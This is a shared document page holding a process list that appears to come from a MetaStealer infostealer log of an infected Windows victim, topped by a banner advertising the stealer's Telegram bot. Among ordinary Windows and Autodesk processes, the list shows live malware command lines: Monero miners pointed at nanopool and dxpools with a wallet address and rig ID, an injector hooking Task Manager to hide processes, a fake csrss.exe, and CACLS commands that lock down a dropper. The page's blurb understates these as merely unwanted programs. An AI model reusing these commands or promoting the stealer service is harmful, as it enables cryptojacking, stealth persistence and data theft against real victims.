Process List

The document lists process and program information running on a system including process IDs, names, and command lines. Many of the processes are related to Windows and browser functionality while others indicate potentially unwanted programs are running.

Uploaded by

blackcaliber44

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 628, Name: csrss.exe, CommandLine:


===============
ID: 808, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 952, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1040, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 1340, Name: atieclxx.exe, CommandLine: atieclxx
===============
ID: 3992, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4020, Name: svchost.exe, CommandLine: c:\windows\system32\svchost.exe -k
unistacksvcgroup -s CDPUserSvc
===============
ID: 4052, Name: svchost.exe, CommandLine: c:\windows\system32\svchost.exe -k
unistacksvcgroup -s WpnUserService
===============
ID: 1128, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 4284, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 4476, Name: explorer.exe, CommandLine: C:\WINDOWS\Explorer.EXE
===============
ID: 5060, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 4352, Name: SearchUI.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -
ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
===============
ID: 3880, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5196, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5480, Name: SkypeBackgroundHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c\
SkypeBackgroundHost.exe" -ServerName:SkypeBackgroundHost
===============
ID: 5496, Name: ApplicationFrameHost.exe, CommandLine: C:\WINDOWS\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 5904, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 1360, Name: MSASCuiL.exe, CommandLine: "C:\Program Files\Windows Defender\
MSASCuiL.exe"
===============
ID: 6716, Name: OneDrive.exe, CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 7556, Name: svcservice.exe, CommandLine: "C:\Users\User\AppData\Roaming\
telemetry\svcservice.exe"
===============
ID: 7652, Name: oneetx.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
10180c8ca3\oneetx.exe"
===============
ID: 7704, Name: AutodeskDesktopApp.exe, CommandLine: "C:\Program Files (x86)\
Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
===============
ID: 7724, Name: GenuineService.exe, CommandLine: "C:\ProgramData\Autodesk\Genuine
Service\x64\GenuineService.exe"
===============
ID: 7776, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\acwebbrowser.exe" --approot=SOFTWARE\Autodesk --
appAgent=/AUTODESKDESKTOPAPP/8.5.0.17/es-ES/0001 --lang=es-ES --cache-path="C:\
Users\User\AppData\Local\Autodesk\Autodesk Desktop App\BrowserCache" --peerPid=7704

===============
ID: 7960, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\acwebbrowser.exe" --type=gpu-process --
channel="7776.0.1937806387\744104333" --no-sandbox --lang=es-ES --log-file="C:\
Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\debug.log" --log-
severity=disable --peerpid=7704 --disable-direct-composition --supports-dual-
gpus=false --gpu-driver-bug-workarounds=4,12,13,25,54 --gpu-vendor-id=0x1002 --gpu-
device-id=0x6810 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-
version=22.19.162.4 --lang=es-ES --log-file="C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\debug.log" --log-severity=disable --peerpid=7704
--mojo-platform-channel-handle=1300 /prefetch:2
===============
ID: 8044, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\acwebbrowser.exe" --type=renderer --no-sandbox --
primordial-pipe-token=9DB26E3B0071B6FB128A472BD455CFCF --lang=en-US --lang=es-ES --
log-file="C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\
debug.log" --log-severity=disable --peerpid=7704 --enable-pinch --device-scale-
factor=1 --num-raster-threads=2 --content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="7776.1.460668884\194047198" --mojo-platform-channel-handle=1896
/prefetch:1
===============
ID: 8052, Name: mstsca.exe, CommandLine: C:\Users\User\AppData\Roaming\Microsoft\
Network\mstsca.exe
===============
ID: 7204, Name: oneetx.exe, CommandLine: C:\Users\User\AppData\Local\Temp\
cb7ae701b3\oneetx.exe
===============
ID: 5960, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS
"oneetx.exe" /P "User:N"&&CACLS "oneetx.exe" /P "User:R" /E&&echo Y|CACLS "..\
cb7ae701b3" /P "User:N"&&CACLS "..\cb7ae701b3" /P "User:R" /E&&Exit
===============
ID: 5532, Name: acad.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD 2018\
acad.exe" /product ACAD /language "es-ES"
===============
ID: 7628, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 4004, Name: svchost.exe, CommandLine: c:\windows\system32\svchost.exe -k
unistacksvcgroup
===============
ID: 7040, Name: OpenWith.exe, CommandLine: C:\WINDOWS\system32\OpenWith.exe -
Embedding
===============
ID: 7544, Name: SkypeApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -
ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
===============
ID: 8768, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9308, Name: WRlr93jfY6F2v8kcgnz_9dEN.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\WRlr93jfY6F2v8kcgnz_9dEN.exe"
===============
ID: 7548, Name: csrss.exe, CommandLine: C:\WINDOWS\rss\csrss.exe
===============
ID: 8856, Name: injector.exe, CommandLine: C:\Users\User\AppData\Local\Temp\csrss\
injector\injector.exe taskmgr.exe C:\Users\User\AppData\Local\Temp\csrss\injector\
NtQuerySystemInformationHook.dll
===============
ID: 7640, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 9088, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 9740, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 6832, Name: dSBtq.exe, CommandLine: C:\Users\User\AppData\Local\c9f346a0-b2de-
4370-961e-ea0e586137ce\dSBtq.exe --Task
===============
ID: 6824, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 10236, Name: explorer.exe, CommandLine: C:\WINDOWS\explorer.exe
===============
ID: 3248, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 2560, Name: explorer.exe, CommandLine: C:\WINDOWS\explorer.exe
===============
ID: 9672, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 3320, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 452, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 8988, Name: explorer.exe, CommandLine: C:\WINDOWS\explorer.exe
===============
ID: 6500, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 9640, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 6324, Name: wup.exe, CommandLine: C:\Users\User\AppData\Local\Temp\csrss\wup\
xarch\wup.exe -o dxpools.net:40001 --rig-id 0ebea37d-a215-4e4b-8e3a-7eef19c4bace --
tls --nicehash -o dxpools.net:443 --rig-id 0ebea37d-a215-4e4b-8e3a-7eef19c4bace --
tls --nicehash -o dxpools.net:80 --rig-id 0ebea37d-a215-4e4b-8e3a-7eef19c4bace --
nicehash --http-port 3433 --http-access-token 0ebea37d-a215-4e4b-8e3a-7eef19c4bace
--randomx-wrmsr=-1
===============
ID: 9660, Name: FDTSH0DLi5H1_wAgQLp7PBti.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\FDTSH0DLi5H1_wAgQLp7PBti.exe"
===============
ID: 7684, Name: acad.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD 2018\
acad.exe"
===============
ID: 6040, Name: acwebbrowser.exe, CommandLine: "C:\Program Files\Common Files\
Autodesk Shared\CLM\V5\MSVC14\cliccore\acwebbrowser.exe" -approot=\SOFTWARE\
Autodesk\Clm\ -extension=ClicJsBrowserExtensions.dll -interopid=000002859C5A8B50
--force-device-scale-factor=1 --peerPid=7684
===============
ID: 9108, Name: acwebbrowser.exe, CommandLine: "C:\Program Files\Common Files\
Autodesk Shared\CLM\V5\MSVC14\cliccore\acwebbrowser.exe" --type=gpu-process --
channel="6040.0.1208888166\1964452983" --no-sandbox --lang=en-US --log-file="C:\
Program Files\Common Files\Autodesk Shared\CLM\V5\MSVC14\cliccore\debug.log" --log-
severity=disable --peerpid=7684 --extension="C:\Program Files\Common Files\Autodesk
Shared\CLM\V5\MSVC14\cliccore\ClicJsBrowserExtensions.dll" --
interopid=000002859C5A8B50 --disable-direct-composition --supports-dual-gpus=false
--gpu-driver-bug-workarounds=4,12,13,25,54 --gpu-vendor-id=0x1002 --gpu-device-
id=0x6810 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-
version=22.19.162.4 --lang=en-US --log-file="C:\Program Files\Common Files\Autodesk
Shared\CLM\V5\MSVC14\cliccore\debug.log" --log-severity=disable --peerpid=7684 --
extension="C:\Program Files\Common Files\Autodesk Shared\CLM\V5\MSVC14\cliccore\
ClicJsBrowserExtensions.dll" --interopid=000002859C5A8B50 --mojo-platform-channel-
handle=1340 /prefetch:2
===============
ID: 7152, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --appRoot=Software\Autodesk\AutoCAD\R22.0\ACAD-
1001:40A\Applications --appAgent=Autodesk/ACAD/22.0/es-ES/1001 --lang=es-ES --
cache-path="C:\Users\User\AppData\Local\Autodesk\AutoCAD 2018\R22.0\esp\
BrowserCache" --peerPid=7684
===============
ID: 5504, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --type=gpu-process --
channel="7152.0.1281999637\632044022" --no-sandbox --lang=es-ES --log-file="C:\
Program Files\Autodesk\AutoCAD 2018\acwebbrowser\debug.log" --log-severity=disable
--peerpid=7684 --disable-direct-composition --supports-dual-gpus=false --gpu-
driver-bug-workarounds=4,12,13,25,54 --gpu-vendor-id=0x1002 --gpu-device-id=0x6810
--gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-version=22.19.162.4
--lang=es-ES --log-file="C:\Program Files\Autodesk\AutoCAD 2018\acwebbrowser\
debug.log" --log-severity=disable --peerpid=7684 --mojo-platform-channel-
handle=1284 /prefetch:2
===============
ID: 8524, Name: acwebbrowser.exe, CommandLine: "C:\Program Files\Common Files\
Autodesk Shared\CLM\V5\MSVC14\cliccore\acwebbrowser.exe" --type=renderer --force-
device-scale-factor=1 --no-sandbox --disable-databases --primordial-pipe-
token=FB9C41D7E74C4216D023372C73D5AE4B --lang=en-US --lang=en-US --log-file="C:\
Program Files\Common Files\Autodesk Shared\CLM\V5\MSVC14\cliccore\debug.log" --log-
severity=disable --peerpid=7684 --extension="C:\Program Files\Common Files\Autodesk
Shared\CLM\V5\MSVC14\cliccore\ClicJsBrowserExtensions.dll" --
interopid=000002859C5A8B50 --enable-pinch --device-scale-factor=1 --num-raster-
threads=2 --content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="6040.1.171533669\563851143" --mojo-platform-channel-handle=1844
/prefetch:1
===============
ID: 6328, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --type=renderer --no-sandbox --primordial-pipe-
token=420A3CE620467D2E62E3699DD415E2A0 --lang=en-US --lang=es-ES --log-file="C:\
Program Files\Autodesk\AutoCAD 2018\acwebbrowser\debug.log" --log-severity=disable
--peerpid=7684 --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --
content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="7152.1.679279066\1950648157" --mojo-platform-channel-handle=1248
/prefetch:1
===============
ID: 9908, Name: AcHelp2.exe, CommandLine: "C:\Program Files\Common Files\Autodesk
Shared\AcHelp2.exe" /Automation -Embedding
===============
ID: 1656, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --type=renderer --no-sandbox --primordial-pipe-
token=03AE9E469A24EFB5D199F469EEFCD421 --lang=en-US --lang=es-ES --log-file="C:\
Program Files\Autodesk\AutoCAD 2018\acwebbrowser\debug.log" --log-severity=disable
--peerpid=7684 --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --
content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="7152.3.2032955003\1482132004" --mojo-platform-channel-handle=3404
/prefetch:1
===============
ID: 6748, Name: SWyxXAL3aA0H8OArgi0xqYXq.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\SWyxXAL3aA0H8OArgi0xqYXq.exe"
===============
ID: 1384, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 1112, Name: 934057bb263593087d4cce4817adb057.exe, CommandLine: C:\Users\User\
AppData\Local\Temp\csrss\934057bb263593087d4cce4817adb057.exe
===============
ID: 9528, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 8204, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 8008, Name: DVbTMCiVq9nJoGROzZZCPO7Z.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\DVbTMCiVq9nJoGROzZZCPO7Z.exe"
===============
ID: 10212, Name: OV27PXY0AvduG2i2myf55Hga.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\OV27PXY0AvduG2i2myf55Hga.exe"
===============
ID: 472, Name: is-O7JTK.tmp, CommandLine: "C:\Users\User\AppData\Local\Temp\is-
2JOBS.tmp\is-O7JTK.tmp" /SL4 $D0400 "D:\Documents\Pictures\Minor Policy\
DVbTMCiVq9nJoGROzZZCPO7Z.exe" 2562561 56320
===============
ID: 2500, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 8148, Name: Vyd_pkJfkheUyRurbhlHef0U.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\Vyd_pkJfkheUyRurbhlHef0U.exe"
===============
ID: 7024, Name: bjlk_7b_S9vJXUko_9mHwiFQ.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\bjlk_7b_S9vJXUko_9mHwiFQ.exe"
===============
ID: 2932, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 3560, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 8380, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929535733
===============
ID: 2412, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 1944, Name: gpupdate.exe, CommandLine: "C:\WINDOWS\system32\gpupdate.exe"
/force
===============
ID: 1428, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
